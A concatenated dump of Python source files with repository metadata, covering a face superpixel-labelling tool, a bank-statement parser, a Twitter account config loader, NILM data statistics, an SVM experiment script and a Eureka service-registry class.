faces_folder = sys.argv[1]
sp_folder = sys.argv[2]
output_folder = sys.argv[3]
if not os.path.exists(output_folder):
os.mkdir(output_folder)
# faces_folder = '../Datasets/lfw-deepfunneled/'
# sp_folder = '../Datasets/lfw-deepfunneled-sp/'
# output_folder = '../Datasets/lfw-deepfunneled-sp-overlay/'
for face_file in sorted(os.listdir(faces_folder)):
if not face_file.endswith(".jpg"):
continue
file_name = os.path.splitext(face_file)[0]
super_scribbles_file = os.path.join(output_folder, file_name + '.png')
if os.path.exists(super_scribbles_file):
continue
face = cv2.imread(os.path.join(faces_folder, face_file))
person_name = file_name[:-5]
sp_file = os.path.join(os.path.join(sp_folder, person_name), file_name + '.dat')
if not os.path.exists( sp_file ):
print('\033[1m' + 'Superpixels not found in ' + sp_file + '\033[0m')
exit(0)
print('Editing ' + '\033[1m' + file_name + '\033[0m' + "...")
# Superpixels: watch out, SP do not have univoque numbering
sp = np.fromfile(sp_file, dtype=int, count=-1, sep=' ')
sp = np.array(sp, dtype=np.uint8)
sp = np.reshape(sp, (250, -1))
h, w = sp.shape
# Superpixels bounds
bounds = np.zeros(sp.shape)
for y in range(0, h):
for x in range(0, w):
if y > 0:
if sp[y, x] != sp[y-1, x ]:
bounds[y,x] = 255;
continue
if y < h-1:
if sp[y, x] != sp[y+1, x ]:
bounds[y,x] = 255;
continue
if y < h-1 and x > 0:
if sp[y, x] != sp[y+1, x-1]:
bounds[y,x] = 255;
continue
if y < h-1 and x < w-1:
if sp[y, x] != sp[y+1, x+1]:
bounds[y,x] = 255;
continue
if y > 0 and x > 0:
if sp[y, x] != sp[y-1, x-1]:
bounds[y,x] = 255;
continue
if y > 0 and x < w-1:
if sp[y, x] != sp[y-1, x+1]:
bounds[y,x] = 255;
continue
if x > 0:
if sp[y, x] != sp[y , x-1]:
bounds[y,x] = 255;
continue
if x < w-1:
if sp[y, x] != sp[y , x+1]:
bounds[y,x] = 255;
continue
# Erode
kernel = np.ones((2,2),np.uint8)
bounds = cv2.erode(bounds, kernel, iterations = 1)
# Boundaries visualization
b,g,r = cv2.split(face)
r[bounds > 0] = r[bounds > 0] * 0.2 + 255 * 0.8;
bounds = cv2.merge((b,g,r))
## SP re-indexing: there could be several superpixels for each SP index label
index = 0
sp_reindex = np.zeros(sp.shape, dtype='uint32')
for s in range(0,np.amax(sp)+1):
mask = np.zeros(sp.shape, dtype='uint8')
mask[sp == s] = 255
_, components = cv2.connectedComponents(mask, connectivity=4)
if np.amax(components):
for c in range(1,np.amax(components)+1):
index = index + 1
sp_reindex[components == c] = index
# Scribbles
scribbles = np.zeros(face.shape)
super_scribbles = scribbles.copy()
face_canvas = face.copy()
# Mouse events callback
cv2.namedWindow(file_name)
cv2.setMouseCallback(file_name, onClick)
# Defaults
radius = 2
category = 1
while True:
# Key handlers
k = cv2.waitKey(1) & 0xFF
if k >= 48 and k <= 53:
category = k - 48
elif k == ord('e'):
category = 0
elif k == ord('q'):
radius = min(radius + 2, 16)
elif k == ord('a'):
radius = max(radius - 2, 2)
elif k == 32:
if radius < 10:
radius = 16
else:
radius = 2
elif k == 13:
break
elif k == 27:
exit(0)
# Compositing
alpha = 0.12
face_canvas = face.copy()
face_canvas[super_scribbles != 0] = face_canvas[super_scribbles != 0] * alpha + super_scribbles[super_scribbles != 0] * (1-alpha)
alpha = 0.12
bounds_canvas = bounds.copy()
bounds_canvas[scribbles != 0] = bounds_canvas[scribbles != 0] * alpha + scribbles[scribbles != 0] * (1-alpha)
alpha = 0.5
overlay = bounds_canvas.copy()
cv2.circle(overlay, pointer, radius, label_colors[category], -1)
bounds_canvas = cv2.addWeighted(bounds_canvas, alpha, overlay, 1 - alpha, 0)
vis = np.concatenate((bounds_canvas, face_canvas), axis=1)
vis = cv2.resize(vis, (vis.shape[1] * resize, vis.shape[0] * resize), cv2.INTER_NEAREST)
# Info
font_size = 0.6
font_thickness = 2
hstep = 25
info = "Label (0-5,e): "
cv2.putText(vis, info, (10, hstep * 1), cv2.FONT_HERSHEY_SIMPLEX, font_size, (255,255,255))
info = " " + label_names[category]
cv2.putText(vis, info, (10, hstep * 1), cv2.FONT_HERSHEY_SIMPLEX, font_size, label_colors[category], font_thickness)
info = "Stroke (q-a,space): " + str(radius)
cv2.putText(vis, info, (10, hstep * 2), cv2.FONT_HERSHEY_SIMPLEX, font_size, (255,255,255))
info = "Save and give me more (enter)"
cv2.putText(vis, info, (10, hstep * 3), cv2.FONT_HERSHEY_SIMPLEX, font_size, (255,255,255))
info = "Exit (esc)"
cv2.putText(vis, info, (10, hstep * 4), cv2.FONT_HERSHEY_SIMPLEX, font_size, (255,255,255))
cv2.imshow(file_name, vis)
cv2.destroyWindow(file_name)
# Save output
cv2.imwrite(super_scribbles_file, super_scribbles)
print("Labels saved in " + super_scribbles_file)
cv2.destroyAllWindows() | 1,102 | 0 | 24 |
4932fba9552bc11f9f06f26912ae8f3c6f9d4de7 | 806 | py | Python | benchmark/analyzer/moo.py | anyoptimization/pymoo-benchmark | 37460f3bf0159c1113cd48d5698af6493f26ed62 | [
"Apache-2.0"
] | null | null | null | benchmark/analyzer/moo.py | anyoptimization/pymoo-benchmark | 37460f3bf0159c1113cd48d5698af6493f26ed62 | [
"Apache-2.0"
] | null | null | null | benchmark/analyzer/moo.py | anyoptimization/pymoo-benchmark | 37460f3bf0159c1113cd48d5698af6493f26ed62 | [
"Apache-2.0"
] | null | null | null | import numpy as np
from benchmark.analyzer.analyzer import Analyzer
from pymoo.indicators.igd import IGD
from pymoo.util.misc import from_dict
| 23.028571 | 110 | 0.58933 | import numpy as np
from benchmark.analyzer.analyzer import Analyzer
from pymoo.indicators.igd import IGD
from pymoo.util.misc import from_dict
class MultiObjectiveAnalyzer(Analyzer):
def do(self, data, scope=None, benchmark=None, inplace=False, **kwargs):
assert benchmark is not None, "The benchmark is necessary to retrieve the known optimum of a function"
problem = benchmark.problems[data["problem"]]["obj"]
CV, F = from_dict(data, "CV", "F")
igd = np.inf
pf = problem.pareto_front(**kwargs)
if pf is not None:
igd = IGD(pf, zero_to_one=True).do(F)
ret = {
"pf": pf,
"igd": igd,
}
if inplace:
for k, v in ret.items():
data[k] = v
return ret
| 589 | 18 | 50 |
f8ae225d654592fb0e1c61fe150a20a7e4fe50d2 | 2,390 | py | Python | bankreader/readers/gpc.py | misli/django-bankreader | c741c9af3f11899b1d9c9f2966da4810b3ade4c2 | [
"BSD-3-Clause"
] | 1 | 2018-10-13T22:38:42.000Z | 2018-10-13T22:38:42.000Z | bankreader/readers/gpc.py | misli/django-bankreader | c741c9af3f11899b1d9c9f2966da4810b3ade4c2 | [
"BSD-3-Clause"
] | null | null | null | bankreader/readers/gpc.py | misli/django-bankreader | c741c9af3f11899b1d9c9f2966da4810b3ade4c2 | [
"BSD-3-Clause"
] | null | null | null | import datetime
from .base import BaseReader
| 43.454545 | 103 | 0.47364 | import datetime
from .base import BaseReader
class GpcReader(BaseReader):
label = 'GPC'
def read_transactions(self, rows):
transaction = None
for row in rows:
# first row of transaction data
if row[:3] == '075':
if transaction:
# send previous transaction data
if 'entry_date' not in transaction:
transaction['entry_date'] = transaction['accounted_date']
yield transaction
transaction = None
if row[60] in '12':
# create new transaction data
amount = int(row[48:60]) / 100.0
transaction = {
'transaction_id': row[35:48],
'accounted_date': datetime.datetime.strptime(row[122:128], '%d%m%y').date(),
'remote_account_number': '%s-%s/%s'
% (
row[19:25],
row[25:35],
row[73:77],
),
'remote_account_name': row[97:117].strip(),
'amount': amount if row[60] == '2' else -amount,
'variable_symbol': int(row[61:71]),
'constant_symbol': int(row[77:81]),
'specific_symbol': int(row[81:91]),
}
# second row of transaction data
elif transaction and row[:3] == '076':
try:
transaction['entry_date'] = datetime.datetime.strptime(row[29:35], '%d%m%y').date()
except ValueError:
transaction['entry_date'] = transaction['accounted_date']
transaction['sender_description'] = row[35:127].strip()
# third row of transaction data
elif transaction and row[:3] == '078':
transaction['recipient_description'] = row[3:127].strip()
# 4th row of transaction data
elif transaction and row[:3] == '079':
transaction['recipient_description'] += row[3:73].strip()
if transaction:
if 'entry_date' not in transaction:
transaction['entry_date'] = transaction['accounted_date']
yield transaction
| 2,268 | 52 | 23 |
df583998f4298c2678b7c6deeb6e9ca08bc60cb7 | 2,535 | py | Python | tweepyutils/config.py | Exceen/tweepyutils | 24abbdc4c9ef546565a59e44d1171af96db7bfcf | [
"MIT"
] | null | null | null | tweepyutils/config.py | Exceen/tweepyutils | 24abbdc4c9ef546565a59e44d1171af96db7bfcf | [
"MIT"
] | null | null | null | tweepyutils/config.py | Exceen/tweepyutils | 24abbdc4c9ef546565a59e44d1171af96db7bfcf | [
"MIT"
] | null | null | null | import json
import os
import constants
import accounts
| 31.6875 | 145 | 0.629191 | import json
import os
import constants
import accounts
class Config(object):
def __init__(self, config_file):
super(Config, self).__init__()
self.config_file = config_file
self._config = None
@property
def config(self):
if self._config == None:
self.__init_config()
return self._config
@config.setter
def config(self, config):
self._config = config
@config.deleter
def config(self):
self._config = {}
@property
def account_config(self):
if constants.ACCOUNTS not in self.config:
self.config[constants.ACCOUNTS] = {}
return self.config[constants.ACCOUNTS]
@account_config.setter
def account_config(self, account_config):
self.config[constants.ACCOUNTS] = account_config
@account_config.deleter
def account_config(self):
self.config[constants.ACCOUNTS] = {}
def __init_config(self):
self._config = {}
if os.path.isfile(self.config_file):
with open(self.config_file, 'r') as f:
json_config = json.load(f)
account_config = json_config.get(constants.ACCOUNTS) or {}
account_dict = {}
for key, data in account_config.iteritems():
consumer_key = data.get(constants.CONSUMER_KEY)
consumer_secret = data.get(constants.CONSUMER_SECRET)
access_token = data.get(constants.ACCESS_TOKEN)
access_token_secret = data.get(constants.ACCESS_TOKEN_SECRET)
is_main_account = data.get(constants.IS_MAIN_ACCOUNT) or False
is_dev_account = data.get(constants.IS_DEV_ACCOUNT) or False
account = accounts.Account(consumer_key, consumer_secret, access_token, access_token_secret, is_main_account, is_dev_account)
account_dict[key] = account
self._config[constants.ACCOUNTS] = account_dict
def save(self):
json_account_config = {}
for account in self.account_config:
json_account_config[account] = self.account_config[account].to_json()
json_config = {}
json_config[constants.ACCOUNTS] = json_account_config
if not os.path.isdir(os.path.dirname(constants.CONFIG_FILE)):
os.makedirs(os.path.dirname(constants.CONFIG_FILE))
with open(constants.CONFIG_FILE, 'w') as f:
json.dump(json_config, f, indent=4, sort_keys=True)
| 2,089 | 367 | 23 |
e3f62e16697481b90502199cd85fd7286b9049c4 | 6,285 | py | Python | nilmtk/stats/goodsections.py | erayon/nilmtk | 218eb414705621cd9bd26947f36e77428d3227b2 | [
"Apache-2.0"
] | 1 | 2018-08-08T08:04:54.000Z | 2018-08-08T08:04:54.000Z | nilmtk/stats/goodsections.py | erayon/nilmtk | 218eb414705621cd9bd26947f36e77428d3227b2 | [
"Apache-2.0"
] | null | null | null | nilmtk/stats/goodsections.py | erayon/nilmtk | 218eb414705621cd9bd26947f36e77428d3227b2 | [
"Apache-2.0"
] | 1 | 2021-05-15T16:18:28.000Z | 2021-05-15T16:18:28.000Z | from __future__ import print_function, division
import numpy as np
from numpy import diff, concatenate
import gc
from .goodsectionsresults import GoodSectionsResults
from ..timeframe import TimeFrame
from ..utils import timedelta64_to_secs
from ..node import Node
from ..timeframe import list_of_timeframes_from_list_of_dicts, timeframe_from_dict
class GoodSections(Node):
"""Locate sections of data where the sample period is <= max_sample_period.
Attributes
----------
previous_chunk_ended_with_open_ended_good_section : bool
"""
requirements = {'device': {'max_sample_period': 'ANY VALUE'}}
postconditions = {'statistics': {'good_sections': []}}
results_class = GoodSectionsResults
def _process_chunk(self, df, metadata):
"""
Parameters
----------
df : pd.DataFrame
with attributes:
- look_ahead : pd.DataFrame
- timeframe : nilmtk.TimeFrame
metadata : dict
with ['device']['max_sample_period'] attribute
Returns
-------
None
Notes
-----
Updates `self.results`
Each good section in `df` is marked with a TimeFrame.
If this df ends with an open-ended good section (assessed by
examining df.look_ahead) then the last TimeFrame will have
`end=None`. If this df starts with an open-ended good section
then the first TimeFrame will have `start=None`.
"""
# Retrieve relevant metadata
max_sample_period = metadata['device']['max_sample_period']
look_ahead = getattr(df, 'look_ahead', None)
timeframe = df.timeframe
# Process dataframe
good_sections = get_good_sections(
df, max_sample_period, look_ahead,
self.previous_chunk_ended_with_open_ended_good_section)
# Set self.previous_chunk_ended_with_open_ended_good_section
if good_sections:
self.previous_chunk_ended_with_open_ended_good_section = (
good_sections[-1].end is None)
# Update self.results
self.results.append(timeframe, {'sections': [good_sections]})
def get_good_sections(df, max_sample_period, look_ahead=None,
previous_chunk_ended_with_open_ended_good_section=False):
"""
Parameters
----------
df : pd.DataFrame
look_ahead : pd.DataFrame
max_sample_period : number
Returns
-------
sections : list of TimeFrame objects
Each good section in `df` is marked with a TimeFrame.
If this df ends with an open-ended good section (assessed by
examining `look_ahead`) then the last TimeFrame will have
`end=None`. If this df starts with an open-ended good section
then the first TimeFrame will have `start=None`.
"""
index = df.dropna().sort_index().index
del df
if len(index) < 2:
return []
timedeltas_sec = timedelta64_to_secs(diff(index.values))
timedeltas_check = timedeltas_sec <= max_sample_period
# Memory management
del timedeltas_sec
gc.collect()
timedeltas_check = concatenate(
[[previous_chunk_ended_with_open_ended_good_section],
timedeltas_check])
transitions = diff(timedeltas_check.astype(np.int))
# Memory management
last_timedeltas_check = timedeltas_check[-1]
del timedeltas_check
gc.collect()
good_sect_starts = list(index[:-1][transitions == 1])
good_sect_ends = list(index[:-1][transitions == -1])
# Memory management
last_index = index[-1]
del index
gc.collect()
# Use look_ahead to see if we need to append a
# good sect start or good sect end.
look_ahead_valid = look_ahead is not None and not look_ahead.empty
if look_ahead_valid:
look_ahead_timedelta = look_ahead.dropna().index[0] - last_index
look_ahead_gap = look_ahead_timedelta.total_seconds()
if last_timedeltas_check: # current chunk ends with a good section
if not look_ahead_valid or look_ahead_gap > max_sample_period:
# current chunk ends with a good section which needs to
# be closed because next chunk either does not exist
# or starts with a sample which is more than max_sample_period
# away from df.index[-1]
good_sect_ends += [last_index]
elif look_ahead_valid and look_ahead_gap <= max_sample_period:
# Current chunk appears to end with a bad section
# but last sample is the start of a good section
good_sect_starts += [last_index]
# Work out if this chunk ends with an open ended good section
if len(good_sect_ends) == 0:
ends_with_open_ended_good_section = (
len(good_sect_starts) > 0 or
previous_chunk_ended_with_open_ended_good_section)
elif len(good_sect_starts) > 0:
# We have good_sect_ends and good_sect_starts
ends_with_open_ended_good_section = (
good_sect_ends[-1] < good_sect_starts[-1])
else:
# We have good_sect_ends but no good_sect_starts
ends_with_open_ended_good_section = False
# If this chunk starts or ends with an open-ended
# good section then the relevant TimeFrame needs to have
# a None as the start or end.
if previous_chunk_ended_with_open_ended_good_section:
good_sect_starts = [None] + good_sect_starts
if ends_with_open_ended_good_section:
good_sect_ends += [None]
assert len(good_sect_starts) == len(good_sect_ends)
sections = [TimeFrame(start, end)
for start, end in zip(good_sect_starts, good_sect_ends)
if not (start == end and start is not None)]
# Memory management
del good_sect_starts
del good_sect_ends
gc.collect()
return sections
| 35.111732 | 82 | 0.665553 | from __future__ import print_function, division
import numpy as np
from numpy import diff, concatenate
import gc
from .goodsectionsresults import GoodSectionsResults
from ..timeframe import TimeFrame
from ..utils import timedelta64_to_secs
from ..node import Node
from ..timeframe import list_of_timeframes_from_list_of_dicts, timeframe_from_dict
class GoodSections(Node):
"""Locate sections of data where the sample period is <= max_sample_period.
Attributes
----------
previous_chunk_ended_with_open_ended_good_section : bool
"""
requirements = {'device': {'max_sample_period': 'ANY VALUE'}}
postconditions = {'statistics': {'good_sections': []}}
results_class = GoodSectionsResults
def reset(self):
self.previous_chunk_ended_with_open_ended_good_section = False
def process(self):
metadata = self.upstream.get_metadata()
self.check_requirements()
self.results = GoodSectionsResults(
metadata['device']['max_sample_period'])
for chunk in self.upstream.process():
self._process_chunk(chunk, metadata)
yield chunk
def _process_chunk(self, df, metadata):
"""
Parameters
----------
df : pd.DataFrame
with attributes:
- look_ahead : pd.DataFrame
- timeframe : nilmtk.TimeFrame
metadata : dict
with ['device']['max_sample_period'] attribute
Returns
-------
None
Notes
-----
Updates `self.results`
Each good section in `df` is marked with a TimeFrame.
If this df ends with an open-ended good section (assessed by
examining df.look_ahead) then the last TimeFrame will have
`end=None`. If this df starts with an open-ended good section
then the first TimeFrame will have `start=None`.
"""
# Retrieve relevant metadata
max_sample_period = metadata['device']['max_sample_period']
look_ahead = getattr(df, 'look_ahead', None)
timeframe = df.timeframe
# Process dataframe
good_sections = get_good_sections(
df, max_sample_period, look_ahead,
self.previous_chunk_ended_with_open_ended_good_section)
# Set self.previous_chunk_ended_with_open_ended_good_section
if good_sections:
self.previous_chunk_ended_with_open_ended_good_section = (
good_sections[-1].end is None)
# Update self.results
self.results.append(timeframe, {'sections': [good_sections]})
def get_good_sections(df, max_sample_period, look_ahead=None,
previous_chunk_ended_with_open_ended_good_section=False):
"""
Parameters
----------
df : pd.DataFrame
look_ahead : pd.DataFrame
max_sample_period : number
Returns
-------
sections : list of TimeFrame objects
Each good section in `df` is marked with a TimeFrame.
If this df ends with an open-ended good section (assessed by
examining `look_ahead`) then the last TimeFrame will have
`end=None`. If this df starts with an open-ended good section
then the first TimeFrame will have `start=None`.
"""
index = df.dropna().sort_index().index
del df
if len(index) < 2:
return []
timedeltas_sec = timedelta64_to_secs(diff(index.values))
timedeltas_check = timedeltas_sec <= max_sample_period
# Memory management
del timedeltas_sec
gc.collect()
timedeltas_check = concatenate(
[[previous_chunk_ended_with_open_ended_good_section],
timedeltas_check])
transitions = diff(timedeltas_check.astype(np.int))
# Memory management
last_timedeltas_check = timedeltas_check[-1]
del timedeltas_check
gc.collect()
good_sect_starts = list(index[:-1][transitions == 1])
good_sect_ends = list(index[:-1][transitions == -1])
# Memory management
last_index = index[-1]
del index
gc.collect()
# Use look_ahead to see if we need to append a
# good sect start or good sect end.
look_ahead_valid = look_ahead is not None and not look_ahead.empty
if look_ahead_valid:
look_ahead_timedelta = look_ahead.dropna().index[0] - last_index
look_ahead_gap = look_ahead_timedelta.total_seconds()
if last_timedeltas_check: # current chunk ends with a good section
if not look_ahead_valid or look_ahead_gap > max_sample_period:
# current chunk ends with a good section which needs to
# be closed because next chunk either does not exist
# or starts with a sample which is more than max_sample_period
# away from df.index[-1]
good_sect_ends += [last_index]
elif look_ahead_valid and look_ahead_gap <= max_sample_period:
# Current chunk appears to end with a bad section
# but last sample is the start of a good section
good_sect_starts += [last_index]
# Work out if this chunk ends with an open ended good section
if len(good_sect_ends) == 0:
ends_with_open_ended_good_section = (
len(good_sect_starts) > 0 or
previous_chunk_ended_with_open_ended_good_section)
elif len(good_sect_starts) > 0:
# We have good_sect_ends and good_sect_starts
ends_with_open_ended_good_section = (
good_sect_ends[-1] < good_sect_starts[-1])
else:
# We have good_sect_ends but no good_sect_starts
ends_with_open_ended_good_section = False
# If this chunk starts or ends with an open-ended
# good section then the relevant TimeFrame needs to have
# a None as the start or end.
if previous_chunk_ended_with_open_ended_good_section:
good_sect_starts = [None] + good_sect_starts
if ends_with_open_ended_good_section:
good_sect_ends += [None]
assert len(good_sect_starts) == len(good_sect_ends)
sections = [TimeFrame(start, end)
for start, end in zip(good_sect_starts, good_sect_ends)
if not (start == end and start is not None)]
# Memory management
del good_sect_starts
del good_sect_ends
gc.collect()
return sections
| 361 | 0 | 62 |
a7fdc305fe814d6741867f4997f827ae7d0af9cb | 261 | py | Python | core/info.py | Lola224/hakkuframework | b9b87457a24df34f00ceece4928679c6d6b52f59 | [
"MIT"
] | 250 | 2016-12-29T02:43:04.000Z | 2022-03-31T05:51:23.000Z | core/info.py | Lola224/hakkuframework | b9b87457a24df34f00ceece4928679c6d6b52f59 | [
"MIT"
] | 2 | 2017-08-08T06:22:10.000Z | 2021-05-22T01:59:43.000Z | core/info.py | Lola224/hakkuframework | b9b87457a24df34f00ceece4928679c6d6b52f59 | [
"MIT"
] | 86 | 2016-12-29T06:39:34.000Z | 2021-12-12T20:07:39.000Z | from core import colors
version = "pre-1.0"
apiversion = "pre-1.0"
update_date = "2021-07-11"
codename = "phoenix"
about = ("Hakku Framework "+version+" "+codename+
"\nauthor: Noa-Emil Nissinen (4shadoww)"
"\nemail: 4shadoww0@gmail.com"
"\ngithub: 4shadoww")
| 21.75 | 49 | 0.701149 | from core import colors
version = "pre-1.0"
apiversion = "pre-1.0"
update_date = "2021-07-11"
codename = "phoenix"
about = ("Hakku Framework "+version+" "+codename+
"\nauthor: Noa-Emil Nissinen (4shadoww)"
"\nemail: 4shadoww0@gmail.com"
"\ngithub: 4shadoww")
| 0 | 0 | 0 |
4d52a3963bb0f2212ae8fe3380222c58748b8ea3 | 2,799 | py | Python | models/SVM.py | yemx21/ECG | e6dd9bc6e9537e8773494b48814e4686bba98bea | [
"BSD-3-Clause"
] | null | null | null | models/SVM.py | yemx21/ECG | e6dd9bc6e9537e8773494b48814e4686bba98bea | [
"BSD-3-Clause"
] | null | null | null | models/SVM.py | yemx21/ECG | e6dd9bc6e9537e8773494b48814e4686bba98bea | [
"BSD-3-Clause"
] | null | null | null | # -*- coding:utf-8 -*-
import pandas as pd
import numpy as np
import math as math
import os
import time
from sklearn.svm import SVC
from models.cpuutils import *
from sklearn.externals import joblib
import tensorflow as tf
import time
| 35.43038 | 183 | 0.64273 | # -*- coding:utf-8 -*-
import pandas as pd
import numpy as np
import math as math
import os
import time
from sklearn.svm import SVC
from models.cpuutils import *
from sklearn.externals import joblib
import tensorflow as tf
import time
def run_SVM(timesteps, numclasses, train_x, train_y, train_lens, valid_x, valid_y, valid_lens, test_x, test_y, test_lens, modeldir, batchsize, maxepochs, patience, expsnum, **kwargs):
tests_y = []
preds_y = []
epoches = []
class_weights = {}
for c in range(numclasses):
class_weights.update({c:len(train_y) / float(np.count_nonzero(train_y == c))})
arg_svm_kernel = kwargs['svm_kernel']
svmkernel = 'linear' if arg_svm_kernel is None else arg_svm_kernel
print(svmkernel)
for exp in range(expsnum):
print('exp ', str(exp), ': SVM...')
modelfile = modeldir + str(exp) + '_' + svmkernel + '.pkl'
if not os.path.exists(modelfile):
clf = SVC(random_state=int(time.time()), kernel=svmkernel, verbose=True, cache_size=400, class_weight=class_weights, max_iter=500000)
clf.fit(train_x, train_y)
joblib.dump(clf, modelfile)
else:
clf = joblib.load(modelfile)
pred_y = clf.predict(test_x)
tests_y.extend(test_y)
preds_y.extend(pred_y)
epoches.append(30)
print('exp', exp, np.mean(test_y == pred_y))
test_yo= np.reshape(tests_y, [-1])
pred_yo= np.reshape(preds_y, [-1])
target_names = ['Class 1', 'Class 2', 'Class 3', 'Class 4', 'Class 5']
logfile = modeldir + "svm.log"
savemetrics(logfile, epoches, test_yo, pred_yo, target_names)
def test_SVM(timesteps, numclasses, test_x, test_y, test_lens, modeldir, batchsize, expsnum, **kwargs):
tests_y = []
preds_y = []
paramnums = []
durations = []
arg_svm_kernel = kwargs['svm_kernel']
svmkernel = 'linear' if arg_svm_kernel is None else arg_svm_kernel
for exp in range(expsnum):
print('exp ', str(exp), ': SVM...')
modelfile = modeldir + str(exp) + '_' + svmkernel + '.pkl'
clf = joblib.load(modelfile)
paramnum = clf.support_vectors_.size
start_time = time.time()
pred_y = clf.predict(test_x)
duration = (time.time() - start_time) * 1000.0/ float(np.shape(test_x)[0])
tests_y.extend(test_y)
preds_y.extend(pred_y)
print('exp', exp, np.mean(test_y == pred_y))
paramnums.append(paramnum)
durations.append(duration)
test_yo= np.reshape(tests_y, [-1])
pred_yo= np.reshape(preds_y, [-1])
target_names = ['Class 1', 'Class 2', 'Class 3', 'Class 4', 'Class 5']
logfile = modeldir + "svm_"+ svmkernel + ".benchmark"
savebenchmark(logfile, paramnums, durations, test_yo, pred_yo, target_names)
| 2,517 | 0 | 46 |
9b0f8b9b426633ca2735e7cbe8a47041f7b6508c | 13,314 | py | Python | eureka/client/app_info/instance_info.py | haribo0915/Spring-Cloud-in-Python | 0bcd7093869c797df14428bf2d1b0a779f96e573 | [
"Apache-2.0"
] | 5 | 2020-10-06T09:48:23.000Z | 2020-10-07T13:19:46.000Z | eureka/client/app_info/instance_info.py | haribo0915/Spring-Cloud-in-Python | 0bcd7093869c797df14428bf2d1b0a779f96e573 | [
"Apache-2.0"
] | 5 | 2020-10-05T09:57:01.000Z | 2020-10-12T19:52:48.000Z | eureka/client/app_info/instance_info.py | haribo0915/Spring-Cloud-in-Python | 0bcd7093869c797df14428bf2d1b0a779f96e573 | [
"Apache-2.0"
] | 8 | 2020-10-05T06:34:49.000Z | 2020-10-07T13:19:46.000Z | # -*- coding: utf-8 -*-
# standard library
from enum import Enum
from typing import Dict, Optional
# scip plugin
from eureka.client.app_info.lease_info import LeaseInfo
from eureka.utils.timestamp import current_timestamp
__author__ = "Haribo (haribo1558599@gmail.com)"
__license__ = "Apache 2.0"
class InstanceInfo:
"""
The class that holds information required for registration with
Eureka Server and to be discovered by other components.
See com.netflix.appinfo.InstanceInfo.
"""
__slots__ = (
"_instance_id",
"_app_name",
"_app_group_name",
"_ip_address",
"_vip_address",
"_secure_vip_address",
"_lease_info",
"_metadata",
"_last_updated_timestamp",
"_last_dirty_timestamp",
"_action_type",
"_host_name",
"_is_coordinating_discovery_server",
"_is_secure_port_enabled",
"_is_unsecure_port_enabled",
"_port",
"_secure_port",
"_status",
"_overridden_status",
"_is_instance_info_dirty",
)
DEFAULT_PORT = 7001
DEFAULT_SECURE_PORT = 7002
class ActionType(Enum):
"""
Eureka server will set the action type on the instance to let
Eureka client know what action to perform on this instance in
its local registry.
"""
ADD = "ADD"
MODIFIED = "MODIFIED"
DELETED = "DELETED"
def __init__(
self,
instance_id: str,
app_name: str,
ip_address: str,
vip_address: str,
secure_vip_address: str,
lease_info: LeaseInfo,
host_name: str,
app_group_name: str = None,
metadata: Dict[str, str] = None,
last_updated_timestamp: int = None,
last_dirty_timestamp: int = None,
action_type: ActionType = None,
is_coordinating_discovery_server: bool = False,
is_secure_port_enabled: bool = False,
is_unsecure_port_enabled: bool = True,
port: int = DEFAULT_PORT,
secure_port: int = DEFAULT_SECURE_PORT,
status: Status = Status.UP,
overridden_status: Status = Status.UNKNOWN,
is_instance_info_dirty: bool = False,
):
"""
Args:
instance_id: the unique id of the instance.
app_name: the application name of the instance.This is mostly used in querying of instances.
ip_address: the ip address, in AWS scenario it is a private IP.
vip_address: the Virtual Internet Protocol address for this instance. Defaults to hostname if not specified.
secure_vip_address: the Secure Virtual Internet Protocol address for this instance. Defaults to hostname if not specified.
lease_info: the lease information regarding when it expires.
host_name: the default network address to connect to this instance. Typically this would be the fully qualified public hostname.
metadata: all application specific metadata set on the instance.
last_updated_timestamp: last time when the instance was updated.
last_dirty_timestamp: the last time when this instance was touched.
port: the unsecure port number that is used for servicing requests.
secure_port: the secure port that is used for servicing requests.
status: the status indicating whether the instance can handle requests.
overridden_status:the status indicating whether an external process has changed the status.
"""
self._instance_id = instance_id
self._app_name = app_name
self._app_group_name = app_group_name
self._ip_address = ip_address
self._vip_address = vip_address
self._secure_vip_address = secure_vip_address
self._lease_info = lease_info
self._metadata = metadata
self._last_updated_timestamp = last_updated_timestamp
self._last_dirty_timestamp = last_dirty_timestamp
self._action_type = action_type
self._host_name = host_name
self._is_coordinating_discovery_server = is_coordinating_discovery_server
self._is_secure_port_enabled = is_secure_port_enabled
self._is_unsecure_port_enabled = is_unsecure_port_enabled
self._port = port
self._secure_port = secure_port
self._status = status
self._overridden_status = overridden_status
self._is_instance_info_dirty = is_instance_info_dirty
@property
@instance_id.setter
@property
@app_name.setter
@property
@app_group_name.setter
@property
@ip_address.setter
@property
@vip_address.setter
@property
@secure_vip_address.setter
@property
@lease_info.setter
@property
@metadata.setter
@property
@last_updated_timestamp.setter
@property
@last_dirty_timestamp.setter
@property
@port.setter
@property
@secure_port.setter
@property
@action_type.setter
@property
@host_name.setter
@property
@is_secure_port_enabled.setter
@property
@is_unsecure_port_enabled.setter
@property
@status.setter
@property
@overridden_status.setter
@property
@is_instance_info_dirty.setter
@property
@is_coordinating_discovery_server.setter
def is_port_enabled(self, port_type: PortType) -> bool:
"""
Checks whether a port is enabled for traffic or not.
Args:
port_type: indicates whether it is secure or unsecure port.
Returns: true if the port is enabled, false otherwise.
"""
return {
InstanceInfo.PortType.UNSECURE: self._is_unsecure_port_enabled,
InstanceInfo.PortType.SECURE: self._is_secure_port_enabled,
}.get(port_type, False)
def is_dirty(self) -> bool:
"""
Return whether any state changed so that EurekaClient can
check whether to retransmit info or not on the next heartbeat.
Returns: true if the instance is dirty, false otherwise.
"""
return self._is_instance_info_dirty
def set_is_dirty(self):
"""
Set the dirty flag so that the instance information can be carried to
the eureka server on the next heartbeat.
"""
self._is_instance_info_dirty = True
self._last_dirty_timestamp = current_timestamp()
def set_is_dirty_with_time(self) -> int:
"""
Set the dirty flag, and also return the timestamp of the is_dirty event.
Returns: the timestamp when the isDirty flag is set.
"""
self.set_is_dirty()
return self._last_dirty_timestamp
def unset_is_dirty(self, unset_dirty_timestamp: int):
"""
Unset the dirty flag iff the unset_dirty_timestamp matches the last_dirty_timestamp. No-op if
last_dirty_timestamp > unset_dirty_timestamp
Args:
unset_dirty_timestamp: the expected last_dirty_timestamp to unset.
"""
if self._last_dirty_timestamp <= unset_dirty_timestamp:
self._is_instance_info_dirty = False
def set_is_coordinating_discovery_server(self):
"""
Set the flag if this instance is the same as the eureka discovery server that is
return the instances. This flag is used by the discovery clients to
identify the discovery server which is coordinating/returning the
information.
"""
self._is_coordinating_discovery_server = True
def set_status(self, status: Status) -> Optional[Status]:
"""
Set the status for this instance.
Args:
status: status to be set for this instance.
Returns: the previous status if a different status from the current was set, none otherwise.
"""
if self._status != status:
previous_status = self._status
self._status = status
self.set_is_dirty()
return previous_status
